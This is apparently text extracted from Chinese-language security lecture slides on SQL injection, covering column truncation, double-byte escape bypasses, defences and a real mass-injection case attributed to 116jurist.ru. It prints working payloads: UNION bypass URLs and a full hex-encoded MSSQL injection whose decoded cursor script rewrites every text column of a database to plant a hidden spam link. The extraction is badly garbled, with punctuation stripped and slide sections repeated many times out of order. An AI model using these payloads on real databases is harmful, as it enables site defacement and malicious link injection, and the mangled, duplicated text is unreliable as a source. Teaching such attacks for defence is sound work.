bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
